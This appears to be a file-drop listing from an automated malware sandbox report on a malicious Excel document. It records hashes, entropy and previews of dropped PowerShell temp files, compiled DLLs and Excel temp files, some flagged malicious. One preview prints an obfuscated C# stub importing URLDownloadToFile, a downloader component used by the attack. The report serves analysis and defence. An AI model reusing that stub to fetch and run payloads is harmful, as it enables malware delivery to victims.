                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\m05yw41v.4xz.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\qgk1oeyy.wdn.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:MSVC .res
                                                                                                            Category:dropped
                                                                                                            Size (bytes):652
                                                                                                            Entropy (8bit):3.1055279920328136
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygCPak7YnqqBCoPN5Dlq5J:+RI+ycuZhNOCPakSBCoPNnqX
                                                                                                            MD5:CEFD8F238DD896D10247798B895F783A
                                                                                                            SHA1:C894F80FD7C709F13F0324E1B0CC695F433F1116
                                                                                                            SHA-256:D1612E240D43D1D48D94D36C4F69721352B6105B724527AFFAB1CB9418BC4AED
                                                                                                            SHA-512:0BE5D4420B2E76EEEB1C8A1E6452B639B74E197DB974A9FC88D786AAD75035731D7D5314DE82FA1ADB72F357F66957E651CAC5B4D4FC9016B1B71580409A7C26
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.v.g.u.m.1.l.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.v.g.u.m.1.l.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                            C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.0.cs

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):487
                                                                                                            Entropy (8bit):3.787386295423015
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DsYLDS81zuA3Q88NemMGlBHjQXReKJ8SRHy4HpuyCrK6P6gYy:V/DTLDfuJNeKuXfHnCBbYy
                                                                                                            MD5:920EC087C1649B37D3E112B3D5CEB653
                                                                                                            SHA1:43582D6BD4F01B5585CDE7DFF378FA59D38E7F7F
                                                                                                            SHA-256:D0C9B5992704CAA64BB5429349502AE370A05E995CFE05650EE7ECC4142E5BAA
                                                                                                            SHA-512:C79F661748E9176F0F01D405530C4704C7AAB611C2D614F537EA7A7778C846A98A6156DD1F35BBE5AB5644D9C582C1DE6D859925040C7A78AA44D21C19FFC673
                                                                                                            Malicious:false
                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IrRz.{. public class iAywni. {. [DllImport("urLMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr TckVLj,string VIV,string EXlnPJrpNQc,uint bEjz,IntPtr yZVSsDMddO);.. }..}.

                                                                                                            C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):369
                                                                                                            Entropy (8bit):5.2526591390810164
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fy2+zxs7+AEszIP23fysn:p37Lvkmb6KzH+WZEoT
                                                                                                            MD5:C627E2BF6206E1B6E93D6B12C14385E0
                                                                                                            SHA1:4B00ADC8979180F9BAC02C9CEEB640C67A961B96
                                                                                                            SHA-256:C6987FE02324221A3DAB03CF3A1B3344AD27D350C6277CC4F35E21CD191B0A19
                                                                                                            SHA-512:6DB2AFEEBDBFCFB18F0C80B981843DE03C20120D95977A59B573DD259E099BE3089011FDBDCD970CF22E32FB7272407C448130A1CE84961A638E4FCD3A003B73
                                                                                                            Malicious:true
                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.0.cs"

                                                                                                            C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3072
                                                                                                            Entropy (8bit):2.835831782712569
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:etGSXePBG5eAdF8O6kkFh+t4tkZfl3MEWI+ycuZhNOCPakSBCoPNnq:6lsAdeOsh+lJl3Mn1ulOoa3Bnq
                                                                                                            MD5:07D1402F6E25A36788118A81C9815269
                                                                                                            SHA1:3BFCE2564F3565FAD094B567CABEF9CBAC0E0CFD
                                                                                                            SHA-256:8F0B687957900ACEFB80AE11F56507738843755ECD19A3BBA7A2700CA65C262E
                                                                                                            SHA-512:E8AB561FF5314E629102FDECE165EE3FA7E1CB5739104757D545E42E7124631A7D728CFC915D330B5DB66FEBC8771B02531C1931A00CA8297908C24AE009E0C6
                                                                                                            Malicious:true
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :.....P ......L.........R.....Y.....].....i.....n...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.qv

                                                                                                            C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.out

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):866
                                                                                                            Entropy (8bit):5.342696803099571
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:AId3ka6KzfEoyKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
                                                                                                            MD5:47C25EAA628837E9BC7548CA04D2FE69
                                                                                                            SHA1:BDAB01ED6A0C935FF2F991A5FBF71F35ACAF1239
                                                                                                            SHA-256:7CEFBC91B1B170A8E3C76237CB063AAFA63E0607F397F9FB314DE078C6B21FAB
                                                                                                            SHA-512:3466505ACE0D4B734BBE8D05D31A097EB091621F8533EA7A897B75BA4CBCAE4313B7A37AEE4B4AB9B4B9948174A148484016ED2E4AAF973B695C451D74554ACB
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                            C:\Users\user\AppData\Local\Temp\telbbya3.lv2.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\uwv0fjoc.cxg.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\w2mklldr.nlr.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:Unknown
                                                                                                            Category:dropped
                                                                                                            Size (bytes):652
                                                                                                            Entropy (8bit):3.102101036181248
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryupak7YnqqlePN5Dlq5J:+RI+ycuZhNgakSsPNnqX
                                                                                                            MD5:8545820872F68B9974806F4B96E86E88
                                                                                                            SHA1:C50763E96521796B8BEB9BB255F354CA6707AC7D
                                                                                                            SHA-256:31B511E608CEF09CFDF779D1477F607304637945B59851BFE5D18B8932F00EEB
                                                                                                            SHA-512:6F5D67D97AAD0DE0984BABCC3D4C4B2B22FCBAC006CA4FDE4C1F730CC6FBDC5A1F5B827EA1669A17CA9E026161E04DDE73B703F4FC7FE086509F5BA69F935860
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.i.j.x.x.v.a.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.i.j.x.x.v.a.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                            C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.0.cs

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):487
                                                                                                            Entropy (8bit):3.787386295423015
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DsYLDS81zuA3Q88NemMGlBHjQXReKJ8SRHy4HpuyCrK6P6gYy:V/DTLDfuJNeKuXfHnCBbYy
                                                                                                            MD5:920EC087C1649B37D3E112B3D5CEB653
                                                                                                            SHA1:43582D6BD4F01B5585CDE7DFF378FA59D38E7F7F
                                                                                                            SHA-256:D0C9B5992704CAA64BB5429349502AE370A05E995CFE05650EE7ECC4142E5BAA
                                                                                                            SHA-512:C79F661748E9176F0F01D405530C4704C7AAB611C2D614F537EA7A7778C846A98A6156DD1F35BBE5AB5644D9C582C1DE6D859925040C7A78AA44D21C19FFC673
                                                                                                            Malicious:false
                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IrRz.{. public class iAywni. {. [DllImport("urLMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr TckVLj,string VIV,string EXlnPJrpNQc,uint bEjz,IntPtr yZVSsDMddO);.. }..}.

                                                                                                            C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):369
                                                                                                            Entropy (8bit):5.252923832895162
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fUIUzxs7+AEszIP23fUW:p37Lvkmb6KzkWZEoh
                                                                                                            MD5:7AE459464AC95B17B387B6BA13E99879
                                                                                                            SHA1:2A2CACB74B02E1F972FA455422B052FD4956C34C
                                                                                                            SHA-256:E1FA4F787596A841D64A15F8824BD39A2750716FF50B5A0EF9232BC3E77AAA31
                                                                                                            SHA-512:31CA12E27BD6BAE64BC454DC61260CEB0EC9912A5795A1ADC1954C6A8D1595A7BC47CB50FAC3E795B3F44C4DAB7C764431D122A3B69794C7353E711FEDE574FC
                                                                                                            Malicious:false
                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.0.cs"

                                                                                                            C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:Unknown
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3072
                                                                                                            Entropy (8bit):2.8307452944794065
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:etGSBPBG5eAdF8O6kkFS+t4tkZfYEtMEWI+ycuZhNgakSsPNnq:6KsAdeOsS+lJYsMn1ulga38q
                                                                                                            MD5:AD65E2389D9A5A164075DC5EC257BB50
                                                                                                            SHA1:F4A101F8C2BD39D5378707C2CE3EFA245B97AA2D
                                                                                                            SHA-256:94546DCA955BA11274FB4E2A5872CD51BC67E365EC1D6CD9332A9EB7A6C15EDD
                                                                                                            SHA-512:0F9F727B2B5BAC7ADE0CC07ECE8686447B86FE80E4B64207801A9C89E6BC1E629E61B3200E9418C2550A6BF0656E40254DD5F8CD0C5018ADC0ABF504D234D284
                                                                                                            Malicious:false
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :.....P ......L.........R.....Y.....].....i.....n...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.xi

                                                                                                            C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.out

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):866
                                                                                                            Entropy (8bit):5.351145333094713
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:AId3ka6KzFEoEKaMD5DqBVKVrdFAMBJTH:Akka60FEoEKdDcVKdBJj
                                                                                                            MD5:810D2A38D09940E8344F1F2EBF7602E6
                                                                                                            SHA1:8B809AB2455519E5BF1FFC76A2252B6B6A5EBCC8
                                                                                                            SHA-256:24A253DC9CA675FF33E2411815FF48579F9FA825E6F89FFC787FC41646DA7539
                                                                                                            SHA-512:73470D39F887DC268EC327A735DD3981FD4C834D498D89160A2DDB6F93AD738686DF41A84B97EF57CB24F1FEEBCDE7BBCA1D80200691F1B193014C47491A4E6E
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                            C:\Users\user\AppData\Local\Temp\ywosddyq.it4.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\~DF12D407234E5995C3.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\~DFBE08681E0A930E94.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\~DFC4030D08E8153FBD.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):676352
                                                                                                            Entropy (8bit):7.983853789524333
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:uI9dGDGCB/uxqIVyTVRqfPSMCfhhBK9leN+q+fS6IwOE:XHuBuqIVyhRwSNjBK9g+DfS6FO
                                                                                                            MD5:F5E5E6E72AD742EECBED915E5417A2C5
                                                                                                            SHA1:7B93B5FA6B3810552EFAF323B5EB6A18597A78E8
                                                                                                            SHA-256:79B218B61A450B7177346B0942B547B4097B2E544DF53771901D7413FD581307
                                                                                                            SHA-512:CD663CA79B75DECD67F8FCE4AE5A439C0812CCEE23CFDB9129CC6D510CE64A96C9C0F6C3115A5DC9C9608076199726771CAC037818A7EF85A2C9FA82714B82CF
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                            C:\Users\user\AppData\Local\Temp\~DFF6C6553DBC7A7BC2.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):684032
                                                                                                            Entropy (8bit):7.9392103257457505
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:SI9dGDGCB/uxqIVyTVRqfPSMCfhhBK9leN+q+fS6IwOE:jHuBuqIVyhRwSNjBK9g+DfS6FO
                                                                                                            MD5:603F43C36725CC4EEEE77EB655163AF6
                                                                                                            SHA1:CAA92BD85E85F67F23B32B6F7ABF16E14E16BE60
                                                                                                            SHA-256:4E9326CE3B3968CBBFBB01E3B98F35B053CFC00664E6E37FAE8A6CCE98927728
                                                                                                            SHA-512:4FAA4A8885587EBE7AAB3B9151578B7F2368443887CD516330EF6C332B09B20876593DF3795A5C19352AE707A2EFBD39BB28B0AB53AE0A2F59BFC404E3312D3E
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

                                                                                                            Download File
                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):10240
                                                                                                            Entropy (8bit):0.6739662216458647
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                                                            MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                                                            SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                                                            SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                                                            SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                                                            Malicious:false
                                                                                                            Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

                                                                                                            Download File
                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24152
                                                                                                            Entropy (8bit):0.7513521539333206
